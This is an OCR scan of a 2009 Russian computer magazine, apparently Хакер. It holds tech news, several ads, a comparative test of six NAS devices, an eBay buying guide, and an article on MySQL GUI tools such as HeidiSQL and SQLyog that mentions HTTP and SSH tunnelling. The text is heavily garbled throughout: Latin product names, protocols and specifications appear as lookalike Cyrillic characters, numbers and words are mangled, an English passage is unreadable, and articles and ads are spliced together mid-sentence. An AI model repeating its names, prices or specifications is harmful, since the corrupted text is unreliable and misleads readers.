блоггинга ТѵѵШег недавно распространил 
пресс-релиз, согласно которому, в 2010 
году компания собирается расширять- 
ся в сторону стран северо-западной и 
восточной Европы, и всячески себя здесь 
популяризировать. Такуже к концу первой 
половины 2010 года ТѵѵШег обзаведется 
русским интерфейсом, плюс, в скором 
времени, будут нормально реализованы 
функции 5тз2і:ѵѵі1:1:ег, так как компания со- 
бирается активно сотрудничать с нашими 
операторами сотовой связи. Дело в том, 
что пока можно только отправлять твиты 
в свой блог посредством 5М5, а вот полу- 
чать их на свой мобильный в виде 5М5’ок 
нельзя. Но ждать теперь осталось совсем 
недолго. 
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И с браузером плохо, и без него плохо 



Місгозоіі: в очередной раз «прижали», и на этот 
разэтоудалосьантимонопольной комиссии 
Евросоюза. Еще в 2007 году, по наводке Орега 
Воііѵѵаге, было начато расследование относи- 
тельно правомерности включения браузера ІЕ 
в комплект поставки ѴѴіпсІоѵѵз, и оно принесло 
неожиданные плоды. Так как в Місгозоіі: решили уступить требованиям 
антимонополистов, в Европе ѴѴіпсІоѵѵз 7, вполне вероятно, выйдетбез 

Универсальная 
новинка от Ыікоп 

Новая цифровая зеркальная камера от ІЧікоп — 

05000 — унаследовала от старших моделей все 
преимущества, и ориентирована на любителей 
фотографии и семейных развлечений. Главная 
особенность 05000 —ЖК-монитор с переменным 
углом наклона и диагональю 2. 7", который допол- 
няетсобой видоискатель, позволяя производить 
съемку с любыхуглов и из любого положения, что, 
конечно, существенно расширяетспектр возмож- 
ностей. Добавим к этому 1 9 сюжетных режимов, 
функцию Ыѵе Ѵіеѵѵ, позволяющую просмотреть 
илискомпоноватьснимокили роликпрямона 
ЖК-дисплее, и «Календарь», упорядочивающий 



Іпііегпеі; Ехріогег вообще. И хотя это решение М5 и было названо «возмож- 
но позитивным», ОС без браузера, тем не менее, тоже не лучший вариант 
(например, как юзеру скачать себе другой браузер, поумолчанию не имея 
в системе вообще никакого?]. В свете этого антимонопольная комиссия 
продолжает свое расследование и, возможно, обяжет Мі егозой включить в 
ѴѴіпсІоѵѵз сразу несколько браузеров, или же выбор ляжет на плечи произво- 
дителей компьютеров. Місгозоіі: уже заявил а, что предоставит последним 
бесплатный «ІЕ 8 раск» для возвращения браузера в систему. 



отснятое податей времени. Плюс, от моде- 
ли 090 к новинке перешли функции записи 
видеороликов в формате НО и система О-Моѵіе. 
Все это бесспорно делает 05000 привлекательным 
для самой широкой аудитории. Профессионалов, 
в свою очередь, заинтересуют КМОП-матрица с 
высокой чувствительностью и разрешением в 1 2.3 
эффективных мегапикселей, система высокоско- 
ростной обработки изображений ЕХРЕЕО, быстрая 
и точная система АФ с 1 1 точками, механизмочис- 
тки матрицы с системой контроля потока воздуха, а 
также возможность отображения гистограммы для 
увеличенных областей изображения. 






Идеальный маршрутизатор для работы 

в Российских сетях 



А51ІЗ ѴѴІ_-520дІІ - 



лёгкая настройка 
и уникальная 
функциональность! 
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•/ Адаптирован 

для России 

• Протестирован с Акадо, 
Вееііпе, СогЬіпа Теіесот, 
Ооісіеп-Теіесот, МеШуЫе* 

• Утилита быстрой 
настройки ѴѴІГІ и Іпіегпеі 
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- ѴѴІРІ 125М6ИТ/С 

- Удобный интерфейс пользователя на русском языке 

- Порт 115В для подключения большинства 
принтеров и МФУ 

- Выделенные порты для подключения приставки ІРТѴ 




Всемирная гарантия 2 года ѴѴѴѴѴѴ.ЭЗиЗ.Ш Горячая линия АЗЦЗ: (495) 23-11-999 

Дистрибьюторы: БЮРОКРАТ (495) 745-55-11; КоосІоо ТесМпоІодіез (499) 256-1731; 0ЮІ (495) 22-11-111; ПИРИТ-Дистрибуция (495) 974-3210; ТКІМТѴ-ЕІ.ЕСТК0МІС8 ѵѵш.ігі-еі.ги 
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Сплойтпак 

для твоего здоровья 

30 часов на отладку ядерного руткита под ѴѴіпсІоѵѵз 7 , чипсы на завтрак, кола на 
обед, вчерашняя пицца на ужин. Знакомая ситуация? Парень, пора завязывать! 
Долго так не протянешь, время налаживать питание. 

приготовленный по аутентичному карельскому 
рецепту. Не содержит молока и обладает целым рядом клинически доказанных 
свойств: 

ѴеІІе повышает иммунитет и помогает твоему организму противостоять 
неблагоприятным условиям окружающей среды 
ѴеІІе нормализует пищеварение и устраняет дисбактериоз 
ѴеІІе защищает печень, выводя из организма токсины и яды 
Благодаря растворимым пищевым волокнам ѴІТАѴЕІЧ®, ѴеІІе благоприятно 
сказывается на работе сердца 




^ ^еггит 



ТЕСТЕР: АНДРЕЙ МУРАВЬЕВ 
АВТОР: АЛЕКСЕЙ ПОЛЯКОВ 

КОМПЬЮТЕР СПИТ 
— ЗАКАЧКА ИДЕТ 

Сравнительное тестирование сетевых хранилищ 

О покупке сетевого хранилища задумываешься в нескольких случаях. 
Например, утебя домашняя сеть, и нехочется выделятьодин из ком- 
пьютеров на роль постоянно работающего (а также гудящего, греюще- 
гося ижрущего электричество) сервера. Илитебежизненно нехватает 
пары терабайт, а ставить новый дискуже некуда. Или же, наконец, ты 
просто любишьставитьскачиваться на ночьмузыку, фильмы ит.д., а 
гудящий по ночам комп вызываетпротестутвоих родителей. 



ТЕХНОЛОГИЯ 

Фактически, сетевое хранилище (или, сокращен- 
но, ЫА5 — пеТ/ѵогк аФасЬесі зіогаде) представляет 
собой «умную» коробку с операционной системой 
внутри, куда вставляется диск (или несколько 
дисков). В последнем случае мало их вставить, — 
нужно «объяснить» системе, в каком режиметы 
с этими дисками будешь работать — выбратьтип 
РАЮ массива. 

• РАЮ 0 — максимум скорости и объема, мини- 
мальная надежность. Записываемые данные 
просто распараллеливаются по двум дискам: 
часть их хранится на одном, а часть на другом. 
Понятно, что, если «летит» один диск, то ты 
теряешь все. 

• ЛЗСЮ — скорость ниже, чем в предыдущем 
случае, но при выходе из строя одного из дисков 

Тестовое оборудование: 

О-Ыпк 0М5-323 

Меідеаг РеасІуМАБ 0110 КМ02175 
РаісіБопіс Ісу Вох ІВ-МА5421 О-В 
ТЬесиз N2100 
ТРЕМйпеІ ТБ-5402 
2уХЕІ_ М5А220-ЕЕ 



появляется шанс не потерять те данные, которые 
были на втором. Данные пиш^ся не параллель- 
но, а последовательно — кончается один диск, 
система начинает писать на другой. 

• РАЮ 1 — «зеркало». Максимум надежности, 
минимум объема. Одни ите же данныезаписыва- 
ются параллельно на оба диска. Соответственно, 
если выходит из строя один диск, ты ничего не 
теряешь (кроме денегна покупку нового «харда»). 
Зато в объеметеряешь вдвое: поставив два диска 
по 1 Тб, ты получишь массив объемом 1 Тб. 

• РАЮ 5 — разумный компромиссобъема, скоро- 
сти и надежности. Для такого массива необхо- 
димы минимум три диска. Данные при записи 
распараллеливаются, но, помимо самих данных, 
записываются еще и контрольные суммы, позво- 
ляющие восстановить массив в случае выхода из 
строя любого диска. В объеметы теряешь, но не 
таксильно, как в случае РАЮ 1 : изтрехтерабайт- 
ныхдисков получится массив объемом 2 Тб. 
Основной недостаток — режим поддерживается 
далеко не всеми устройствами, тем более, для 
«домашнего» использования. 

Большинство сетевыххранилищ, кроме своей 
основной функции, имеют множество дополни- 
тельных. Например, встроенного клиента для 



закачки через ВіПоггепІ: и возможность работы 
в качестве ѵѵеЬ- или принт-сервера, а некоторые 
особо продвинутые позволяют создать на своей 
базе полноценный ѵѵеЬ-сервер. 

МЕТОДИКАТЕСТИРОВАНИЯ 

Работу хранилищ мы оценивали в самом «скоро- 
стном» режиме — объединив два диска ѴѴезІегп 
ЮідіІаІѴѴВІ 002РВУ5 в массив РАЮ 0. Далее 
хранилище подключалось ксети, монтировался 
сетевой диск, и мы оценивали скорость с помощью 
бенчмарка Сгуз1:аІЮІ5кМагк2.2. Проводились 
тесты на последовательные чтение и запись, а 
также чтение и запись в случайных областях диска 
— блоками по 4 и 51 2 Кб. Также была оценена 
скорость передачи файлов по Йр. 

Затем мы оценивали функционал устройств: 
смотрели, что оно еще «умеет», кроме, собственно, 
обеспечения доступа кфайлам посети. Габариты 
и уровень производимого шума —также важные 
показатели для ЫА5: девайсы обычно включены 
24 часа в сутки лучше, если они никакие напоми- 
наюто своем существовании. Незабыли мы и об 
удобстве установки и конфигурирования, хотя эти 
операции (в идеале) придется выполнить всего 
один раз. 



► 018 
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19000 руб. 



ЮОООруб. 

без дисков 



ОЫ5-323 

Технические характеристики: 

Сетевой интерфейс: І.АЫ ю/юо/юоо Мбит/с ЕІЬегпеІ 

НОО-отсек: 2x3.5” 5 АТА 

Порты ввода/вывода: 1 ХІІ 5 В 

Поддерживаемые сетевые файловые протоколы: СІР 5 / 5 МВ, РТР 
Другие сетевые протоколы: ІІРпР 
Возможности ПАЮ: РАЮ О, РАШ 1, ЛЗСШ 

Дополнительные возможности : медиасервер (ІІРпР АѴ), сервер 
ІТипез, принт-сервер, закачка по НИР, РТР, ВіПоггепІ-клиент 

Габариты, мм : 104x198x132 

••••••••00 



ЫЕТ6ЕАК 

РеабуМАЗ 0110 Р N 02 1 75 

Технические характеристики: 

Сетевой интерфейс: І.АЫ ю/юо/юоо Мбит/с ЕІГіегпеІ 
НОО-отсек: 2x3.5” 5 АТА 

Порты ввода/вывода: 3 x 115 В 

Поддерживаемые сетевые файловые протоколы: СІР 5 / 5 МВ, АРР3.1, 

ЫР 5 ѵ 2 /ѵЗ, НТТР/ 5 , РТР/ 5 , Р 5 ѴІМС 
Другие сетевые протоколы: ІІРпР, Вопіоиг 
Возможности РАЮ: Х-РАШ, НоіБѵѵарраЫе 

Дополнительные возможности: медиасервер (ІІРпР АѴ), сервер ІТипез, 
принт-сервер, ВііТоггепІ-клиент, фотогалерея 

Габариты, мм : 142x101 х 222 



Самое недорогое из протестированныххранилищ, обладающее, ктому 
же, хорошим функционалом и пусть скромным, но приятным дизайном. 
Небольшие габариты позволяют разместить эту коробочку практически 
где угодно —так, чтобы она не мешалась под руками. Харды вставляются 
просто и быстро, никакие инструменты для этого нетребуются. Диски 
могут работать как в РАЮ-массиве, так и отдельно; есть возможность 
разграничения прав доступа по пользователям и выделения квот. Име- 
ется встроенный менеджер закачек, доступный через ѵѵеЬ-интерфейс. 
Софт — удобный в обращении и предоставляет широкие возможности 
конфигурирования. 



0 

Протоколы АРР и ЫР5 не поддерживаются; только один разъем ИЗВ. 



00 



Позиционируется производителем как мультимедийный сервер для 
дома, но, несмотря на это, выглядиточень солидно. Отличительная осо- 
бенность заключается в том, что есть несколько вариантов поставки уже 
с дисками. К нам на тест попала модификация ВЫ 021 75 с одним жестким 
диском Зеадаіе Ваггасиба 7200.1 1 на 750 Гб. Имеется клиент ВГТоггепр 
поддержка медиавещания с помощью ИРпР АѴ. Широки и возможности 
резервного копирования. Устройство обладает приличными скоростны- 
ми характеристиками. 



0 

Девайс достаточно шумный; отсутствует поддержка РАЮ 0 для увеличе- 
ния скорости. 



ХАКЕР 07 /1 27/ 09 
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СКѴ5ТАІ. 0І5К МАРК, МБАЙТ/С 



2уХЕІ_ ІЧ5А220-ЕЕ 

ТРЕМОпеІТБ-5402 

ТЬесизЫ2100 



КаісіБопіс Ісу Вох ІВ-ІМА542Ю-В 

ІЧеІдеаг КеасіуЫАБ 0110 РЫ02175 

(штатные диски] 




РапсІотѴѴгіІеДКВ 
РапсІотРеасІДКВ 
Рапсіот ѴѴгіІе 51 2КВ 
РапсІотРеасІ 51 2КВ 
ЗериепбаІѴѴгіІе 
Зериепііаі РеасІ 



О 5 10 15 20 25 30 35 40 45 50 



КаісіБопіс 

Ісу Вох I В- N А842 1 0-В 

Технические характеристики: 

Сетевой интерфейс: ЬАЫ ю/юо/юоо Мбит/с ЕІЬегпеІ 

НОО-отсек: 1 хЗ. 5” БАТА 

Порты ввода/вывода: 1 хІІБВ, 1 хІІБВтип В 
Поддерживаемые сетевые файловые протоколы: СІР5/5МВ, ЫРБ 
Другие сетевые протоколы: ІІРпР, Вопіоиг 
Возможности ПАЮ: п/а 

Дополнительные возможности: ТѵѵопкуМесІіа, сервер іТипез, принт- 
сервер, ВіІТогтепІ-клиент, работа через ІІБВ. 

Габариты, мм: 240x128x44 



Технические характеристики: 

Сетевой интерфейс: 2 х ЬАЫ ю/юо/юоо Мбит/с ЕІІіегпеІ 

НОО-отсек: 2x3.5” БАТА 

Порты ввода/вывода: 2x115В 

Поддерживаемые сетевые файловые протоколы: СІР5/5МВ, АРР, РТР, 
ЫРБ, НТТР 

Другие сетевые протоколы: ІІРпР 
Возможности ПАЮ: РАЮ О, ВАЮі, ЭВОО 

Дополнительные возможности: медиасервер Ші_ЫА), сервер іТипев, 
принт-сервер, фотогалерея 

Габариты, мм : 160x85x200 

•••••••ООО 




Ьесиз 

N2100 



8000 руб. 



ООО 




Далеко не всегда для домашнего пользования нужны двух- и более дис- 
ковые массивы. Аесли так — зачем платить за ненужныетебе возмож- 
ности, да еще и занимать много места на столе громоздкой коробкой? 
Корпустонкий, компактный, без активного охлаждения (в случае одного 
диска оно и не сильно требуется], может ставиться как горизонтально, 
так и вертикально. РаібЗопіс Ісу Вох I В - N А542 1 0-В можно использовать 
нетолько каксетевое хранилище, но и в качестве обычного внешнего 
ІІ5В-диска. 

0 

Довольно бедный функционал; из-за того, что поддерживается только 
один диск, подходит л ишь для домашнего использования. 




Симпатичная черно-серебристая коробочка, скорее, хорошо впишется 
в интерьер небольшого офиса, чем квартиры. Скоростные показатели 
очень неплохие: по скорости доступа кданным его обгоняеттолько 
ІЧЕТОЕАП ВеабуЫАС ОШ ПІ\Ю2175,а по скорости работы через ЕТР — во- 
обще оставляет конкурента далеко позади. Пара ЕіЬегпеІ-портов позво- 
ляет подключать устройство кдвум сетям сразу, а возможность установки 
модуля ѴѴі-Еі — обойтись без лишних проводов. Приятные особенности 
— можно монтировать образы 150 и есть функция ѴѴеЬ-диска. 

0 

Эффективность применения девайса в домашней сети — вопросспор- 
ный. В основном из-за отсутствия встроенной автоматической «качал- 
ки» и довольно высокого уровня шума. Впрочем, для офисного исполь- 
зования второе не особая помеха, а первое — так вообще плюс. 



► 020 
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РТР, МБАЙТ/С 

2уХЕІ_ ІЧ5А220-ЕЕ 
ТГСЕІМОпеі: ТБ-5402 



ТЬеси5М2100 

КаісіБопіс Ісу Вох ІВ-ІЧА542Ю-В 

МеІдеагКеасіуІѵіАБ 0110 ГМ 02175 

0-І_іпк0М5-323 

і і РТР (сіоѵѵпіоасі) 
а РТР (иріоаб) 
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ІуХЕІ. *= ^ 

Ы5А220-ЕЕ 



/ 

10000 руб. 



ТКЕЫОпеІ 9000 руб. 

Т5-5402 

Технические характеристики: 

Сетевой интерфейс: ЬАИ ю/юо/юоо Мбит/с ЕІЬегпеІ 
НРР-отсек: 2x3.5” БАТА 

Порты ввода/вывода: 2x115В 

Поддерживаемые сетевые файловые протоколы: СІР5/5МВ, РТР, ІМР5 
Другие сетевые протоколы: ІІРпР, Вогцоиг 
Возможности РАЮ: КАШ О, КАШі, НоіБѵѵарраЫе 
Дополнительные возможности: медиасервер (ІІРпР АѴ), сервер 
ІТипез, принт-сервер, ВіПоггепІ-клиент 
Габариты, мм : 120x200x120 



Технические характеристики: 

Сетевой интерфейс: І_АЫ ю/юо/юоо Мбит/с ЕІГіегпеІ 

НОО-отсек: 2x3.5” БАТА 

Порты ввода/вывода: 2х 115В 

Поддерживаемые сетевые файловые протоколы: СІР5/5МВ, ІМР5, РТР, 
НТТР 

Другие сетевые протоколы: ІІРпР 
Возможности РАЮ: КАШ О, КАШ 1, ^(Ш 

Дополнительные возможности: медиасервер (РЫЧА), сервер ІТипез, 
принт-сервер, закачка по НТТР, РТР, ВіІТоггепІ-клиент, заливка на 
ѴоиТиЬе, Рііскг, РТР. 

Габариты, мм: 202x113x142 

•••••••••О 



ООО 




Возможности устройства стандартны, а вот скоростные характеристики — 
очень даже хороши. Корпус металлический с элементами из пластика, с 
прекрасным охлаждением — благодаря большому количеству отверстий 
и встроенному 50-мм вентилятору. Возможно «горячее» подключе- 
ние дисков (правда, перезагрузка после этого все равно потребуется]. 
Интересна функция уведомления пользователя по электронной почте — 
например, когда подходит к концу место на диске. 

0 

Мощный вентилятор в сочетании с металлическим корпусом делают свое 
дело: шумит девайс довольно сильно. Планированиезакачеквозможно 
только по сети ВііТоггепр для Шр и Лр такая возможность отсутствует. 




Дизайн простой, лаконичный и вто же время солидный — какиу 
большей части продукции 2уХЕІ_. Пара ИЗВ-разъемов вынесена на 
переднюю панель, что облегчает к ним доступ. Возможности устройства 
впечатляют: помимо стандартных для девайсов этого класса функций 
(клиент ВііТоггепр медиасервер, принт-сервер, сервер ЬЛр и Лр], под- 
держивается закачка файлов на ѴоиТиЬе, Рііскг и РТР, а также установка 
РРРоЕ-соединения. Поставляемая в комплекте утилита АсгопізТгие 
I гладе Ноте позволит буквально за считанные минуты восстановить 
«упавшую» систему до исходного состояния (разумеется, если ты пре- 
дусмотрительно сделал образ системного диска). 

0 

Уровень шума не слишком высок, но об абсолютной тишине говорить не 
приходится. 



выводы 

Как ни странно, награду «Лучшая покупка» 
получает самое дешевое из протестиро- 
ванных ЫА5 — 0 - Иі п к 0Ы5-323. Девайс без 
излишеств, но все необходимое имеется — 



включая приятный дизайн, компактность и 
возможность работы со всеми тремя типами 
двухдисковых РАЮ-массивов. А приз «Выбор 
редакции» мы отдаем ХуХЕИ Ы5А220-ЕЕ — за 
богатый функционал, удобство использова- 



ния и неплохую скорость. Крометого, хотелось 
бы отметить рекордсменов по скоростным 
характеристикам — ЫЕТВЕАР РеабуЫАБ 0110 
ВЫ 021 75 и ТЬесиз N21 ОО.зс 
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► 021 





Шоппинг по-новому 



Если ты любишь покупать крутые, необычные, нестандартные вещи недорого и эффективно,™ интернет- 
аукционы это то, чтотебе нужно. Тутпродается все, чтоугодно: разнообразные гаджеты, техника, музы- 
кальные инструменты, одежда — и очень часто не просто новые модели из магазина, а что-то действитель- 
но интересное. 

К примеру, если тебе нужно заменить экран на КП К -то понятно, что в сервисе это будет стоить почти как 
новый КПК. Это не наш путь. Наш путь - пойти на еВау.сот и попробовать купить этот же самый экран за $20! 
Тоже самое относится к любым другим вещам: брендовая одежда, электроника, гаджеты. Все, чтоугодно! 




ѵѵѵѵѵѵ.ІтІаЬ.ги 



Заходи на сайт, 
участвуй в конкурсах 
и получай классные 
подарки! 
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СгиНігай Івгуои 
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ВОТТЕБЕ 

ИНСТРУКЦИЯ: 

1. Регистрация 

Регистрация на еВау со- 
вершенно бесплатна и не 
должна вызывать какие-либо 
проблемы. 

2 Поисктоваров 

На аукционе представлены 
десятки миллионов пред- 
ложений. Найти нужный 
товар тебе поможет мощная 
система фильтров: по кате- 
гориям и ключевым словам. 
Предпочтительнее покупатьу 
«небольших магазинов», ко- 
торые занимаются продажей 
интересующего тебя товара 
постоянно (чем иметь дело с 
теми, кто продаеттовар неиз- 
вестного качества «разово»). 
Всегда можно ознакомиться 
с профайлом продавца, про- 
читать фидбеки и сделать 
выводы, что он собой пред- 
ставляет 



3. Перед покупкой 

В описании товара в первую 
очередь смотри варианты 
доставки. Если видишь, что 
продавец работает л ишь с 
Америкой и Канадой, смело 
можно поискать другие пред- 
ложения. Можно, конечно, 
рискнуть и спросить, не от- 
пра вит л и он товар в Россию, 
но в абсолютном большин- 
стве случаев ответом будет 
твердое «Нет!». Поэтому нам 
нужны предложения, где в 
графе доставка указано слово 
ѴѴогШѵѵісІе («по всему миру») 

- или же в списке стран есть 
Европа. 

4 Ставки 

На странице с описанием лю- 
бого изтоваров есть кнопка 
Ріасе ВісІ. Поле рядом - это 
сумма твоей ставки, которая 
должна быть выше текущей 
цены. Нажав на кнопку Ріасе 
ВісІ («поставить ставку»), ты 
получаешь сообщение «Ѵои 
аге Ітііе сиггеп* Ыдб Ьісісіег». 



Оно означает, что твоя ставка 
на данный момент самая вы- 
сокая. Скорее всего, ставку 
кто-нибудь перебьет- купить 
ноутбук или видеокамеру 
за удачную цену желающих 
много. Но как сделать ставку 
правильно и не переплатить? 
И как вообще взимаются 
денежки? Аукцион еВау по- 
зволяетопределить для себя 
максимальную сумму. Напри- 
мер, ты готов потратить $300. 
Ставишь би д «300» и идешь 
спать. Утром выясняется, что 
максимальная цена была 
достигнута в 1 80. Значит, из 
твоих 300 долларов потратит- 
ся 180 + «шаг», например, $5 
или $85, а остальные деньги 
тебе вернутся. 

5 Оплата 

Оплачивать покупки можно 
через систему РауРаЕ если 
что-то пойдет не так, тебе, 
скорее всего, вернуттвои 
деньги назад. Имей в виду 
один нюанс: многие продавцы 



вусловиях оплаты указывают 
Оп Іу сопбгтесі асісі гезз - это 
значит, что они имеют дело 
только с тем аккаунтами 
РауРа I, у которых подтверж- 
ден адрес владельца (в целях 
безопасности). Процедура ве- 
рификации домашнего адреса 
для пользователей из России, 
ксожалению, недоступна. 

6 Доставка 

Есть разные варианты до- 
ставки товара: через частные 
(например, ОН б, ЕебЕх, II Р5 и 
т.д.) и государственные (ІІ5Р5 
-США, Роуаітаіі- Британия, 
«Почта России» и т.п.) компа- 
нии. 

Частные компании доставятто- 
варза несколько дней и вручат 
лично в руки, а весь маршрут 
ты можешь проследить через 
трекинг-систему по инету. За 
сервис приходится платить, за 
саму доставку (зависит от веса 
посылки, но едва ли выйдет 
меньше $40), а также, возмож- 
но, пошлины натаможне. 
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Акиия продлится с 1 июля по 31 декабря 2009 года. 

Регистрация кодов с I июля по 31 август 2009 года. Количество призов 
ограничено! Внешний вид призов может отличаться от их изображения 
а рекламных материалах, 
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КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ 




пкпМііАгІтт 

І/І ІМІ'І ТШѴЯІ I III I 



АЛЬТЕРНАТИВНЫЕ ОБОЛОЧКИ 
ДЛЯ УПРАВЛЕНИЯ БАЗАМИ ДАННЫХ 



Когда мы говорим об инструменте для управления базой данных 
МуЗОБ, то априори считаем, что это будет рЬрМѵАсІтіп . На любом хо- 
стинге — стандарт де-факто. Плохо одно — этотскорее вспомога- 
тельный инструментзачастую используется в качестве основного. 
Но когда постоянно имеешь дело с базой данных, то и инструмент 
нужно выбирать подобающий. 



Нет, против рИрМѵАгітіп я ничего не имею, но 

давай судить трезво. Реализация на РНР позво- 
ляет использовать решение практически где 
угодно, но сразу накладывает серьезные огра- 
ничения по удобству использования. Чего стоят 
полностью перезагружаемые страницы в виду 
отсутствия АбАХ’а. Работа через такой интерфейс 
дается туго, а редактирование данных вообще 
сводит с ума. Ты никогда случайно не нажимал 
кнопку «Удалить страницу», хотя хотел удалить 
одну лишь запись? Я — нажимал. Помимо этого, 
рбрМуАбтіп приходится настраивать для каж- 
дого сервера в отдельности. О доступе к разным 
серверам из одного места остается только меч- 
тать. Да, реализация в виде веб-приложения 
дает плюсы в некоторых ситуациях, но для про- 
ецирования баз, редактирования данных, про- 
граммирования хранимых процедур и сложных 
50Б-запросов есть куда более удачные решения. 

НЕШІ50І. 

В отличие от рЬрМуАбтіп, НеЖОЕ [ѵѵѵѵѵѵ.ЬеісІігдІ. 
сот ] уже не является веб-приложением. Это вин- 
довая программа с продуманным интерфейсом, 
благодаря которому работа с базами превращается 
в одно удовольствие. Преимущества дескгопной 
программы налицо. Просмотр и редактирование 
данных осуществляется через удобнейший дгісі 
(таблица с возможностью редактирования]. Сравни 
это с рЬрМуАбтіп, где в таблицах лишь отобра- 
жаются данные, а изменение любой из записей 



осуществляется на отдельной странице. НеісІіЗСіБ 
позволяет отсортировать данные и, что особенно 
удобно, использовать фильтры, отбирая записи по 
определенной маске. Для большей наглядности к 
таблице можно применить различные цветовые 
схемы — фича из разряда тех, что сначала кажутся 
незначительной мелочью, но через некоторое 
время так к ним привыкаешь, что уже не можешь 
отказаться. 

Впрочем, едва ли работа с базой ограничится 
лишь редашированием таблиц. Одна из клю- 
чевых особенностей программы — редактор 
501-запросов. Как и в современных средах 
разработки, в распоряжение пользователя 
предоставляются модные навороты вроде 
автодополнения названия баз/таблиц/полей, а 
также всплывающие подсказки с конструкциями 
запросов.Теперь вообще можно не напрягаться 
по поводу названия таблиц и полей — НеісІі50І_ 
сама подскажет нужные варианты. Более того, 
пользователю предоставляется система шаблон- 
ных заготовок кода (так называемых сниппетов], 
за счет которых возможно не только упростить, но 
еще и ускорить разработку. Единственный косяк 
— отсутствие закладок для разных запросов. Без 
этой жизненно важной детали интерфейса будет 
ой как сложно, если одновременно приходится 
выполнять несколько разных запросов. Зато дико 
порадовал редактор хранимых процедур, крайне 
дружелюбный к пользователю и упрощающий 
процесс создания функций и триггеров. 



Вообще, с НеісІіЗОБ любые действия с базами 
данных становятся на порядок приятнее. Нет 
ничего проще, чем, например, сделать дамп 
базы с ее структурой и данными: НеібіЗОБ 
быстро сгенерирует любой 50І_-экспорт. Через 
удобный интерфейс можно сдампить структуру 
базы и сами данные в файл или сразу на другой 
сервер. Но перед тем как в тупую переносить 
дамп, подумай: если на обоих серверах есть 
одинаковые базы, то, возможно, уместнее вос- 
пользоваться встроенной функцией по синхро- 
низации. 

Теперь — что касается администрирования. 
НеісІіЗОБ позволяет мониторить и удалять 
клиентские процессы. Это отличная возмож- 
ность проанализировать выполнения запросов 
и удалить левые процессы. Помимо этого, ты 
можешь удобно редактировать переменные 
сервера, а также управлять привилегиями 
пользователей с помощью интерфейса, подоб- 
ного для редактирования АСБ-листа для фай- 
лов ІЧТЕ5. 

К сожалению, все преимущества и преле- 
сти программы летят в тартарары, если на 
сервере заблокирован порт Му50Б демона. 
НеібіЗОБ банально не сможет подключиться 
к серверу и будет абсолютно бесполезным. 
Еще более грустно оттого, что на дешевых 
хости н га х такая ситуация в порядке вещей, а 
механизмов для обхода этого ограничения у 
программы нет. 



► 024 
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рЬрМуАсІппіп із а Жее зоЖл^ЛооІ ѵѵгіЖеп іп 
РНР іпЖпсІесІ Іо ЬапсІІе йЛютіпізЖабоп оі" 
МуЗОЕ оѵег Же ѴѴогЖЛое ѴѴеЬ. рЬрМуАсІппіп 
зиррогЖ а ѵѵісіе орегабопз ѵѵіЖ 

МуЗОЕ. ТЬе п^вРггериепйу изесі орегаііопз 
аге зиррогі^^эу Же изег іпЖгіесе (тападіпд 
баЖЬа^ЯпаЫез, ігеЖз, геіабопз, іпсіехез, 
изелЛрегтіззіопз, еЖ], ѵѵЬіІе уои зШ Ьаѵе Же 
/ Ж сНгесНу ехесиЖ апу ЗОБ зЖЖтепЕ 



рЬрМуАсІтіп із аізо ѵегу сІоситепЖсІ 

іп а Ьоок ѵ 

МазЖгіпд 

Мападеті 

СгесЬ, Сег 

То еазе ил 

ііп із ЖапзІаЖсІ іпЖ 55 Іапдиадез 
аги 




Зіпсе ѵегзіоп 3.0.0, рЬрМ^^^п ріпесі Же 
6оРНР5 іпібаБѵе апсі сиДэесІ сотрабЬіЖу 
сосіе Іог оЖег РНР^ЛгМуЗСЖ ѵегзіопз; 
ѵегзіоп 3 апсі Іа^^гедиігез аі Іеазі: РНР 5.2 
апсі МуЗОи^р^ізе ѵѵіЖ оЖег РНР ог МуЗОБ 
ѵегзіопз^Я^Же оЖег (Ьиі; зШ таіпЖіпесІ) 
Ьгап^^^2.х геіеазез, ѵѵЬісЬ уои сап БпсІ оп 
О^Ш^/пЖасІ раде. 
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ДРУЖЕЛЮБНЫЙ РЕДАКТОР 
ХРАНИМЫХ ПРОЦЕДУР НЕШѴ50І. 



АВТОДОПОЛНЕНИЕ НАЗВАНИЙ БАЗ ДАННЫХ, ТАБЛИЦ И ПОЛЕЙ 
ВО ВРЕМЯ СОСТАВЛЕНИЯ 5СП.-ЗАПР0СА 



5СИ.Ѵ06 

Так что же делать? Если хостер блокирует 
файрволом порты, которые относятся к МуЗОЕ- 
серверу, то соединиться с базой могут исклю- 
чительно локальные программы и скрипты. 
Зачастую с их помощью и приходится осущест- 
влять управление (черт, опять рЬрМуАбтіп!], но 
есть другой вариант — заюзать их в качестве 
посредника! Если залить на сервер специальный 
скрипт, который будет иметь доступ к МуЗОЕ и 
одновременно доступен «снаружи», то его впол- 
не можно использовать как связующее звено 
между СУБД и нашей графической оболочкой. 
Такой прием называется НТТР-тунн ел ингом и 
поддерживается замечательной утилитой для 
работы с базами МуЗОБ — ЗОБуод [ѵѵѵѵѵѵ.ѵѵеЬѵод. 
сот ]. Указываем в настройках соединения адрес 



скрипта ЗОЕуопдТиппеІ.рЬр, предварительно 
размещенного на хостинге, — и файрвол оста- 
ется не у дел. Требуется безопасность? ЗОБуод 
поддерживает подключение по НТТР5. 

Более того, в ЗОЕуопд встроен ЗЗН-клиент и, 
если у тебя в распоряжении есть нормальный 
хостинг с поддержкой Зесиге ЗЬеІІ, то можно 
(и даже — нужно] использовать ЗЗН-туннелинг. 

Это, во-первых, позволит установить безопасный 
канал связи между ЗОБуод и МуЗОБ-сервером, и, 
во-вторых, позволит обратиться до демона, даже 
в том случае, если его порт (по умолчанию 3306] 
закрыт. Нужно лишь указать адрес и портЗЗН- 
хоста (предполагается, что демон баз данных нахо- 
дится на той же машине), указать пароль или при- 
ватный ключ для доступа по 55Н, а также данные 
авторизации непосредственно для МуЗОБ демона. 




В НЕШѴ5СП- РЕАЛИЗОВАН 
УДОБНЕЙШИЙ ИНТЕРФЕЙС 
ДЛЯ РЕДАКТИРОВАНИЯ ДАННЫХ 

Такое соединение работает более стабильно, чем 
через вспомогательный Н^Р-скрипт. Впрочем, 
различные варианты соединения с сервером — 
это, естественно, не единственный плюс програм- 
мы. Вообще, ЗОБуоп — это, своего рода, новатор, 
который зачастую первым вводит самые сочные 
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> ІПІО 

Сам по себе проект 
НеібіЗОБ появился 
относительно недав- 
но, но в действитель- 
ности это развитие 
другого известного 
фронтенда — 
МуЗСП-ЕгопГ Над 
последней версией 
проекта аж полтора 
года в одиночку 
трудился немецкий 
программист. Кста- 
ти, на НеібіЗОБ 
я наткнулся совер- 
шенно случайно, 
когда искал инстру- 
мент для манипули- 
рования данными, 
который может за- 
пускаться с флешки. 
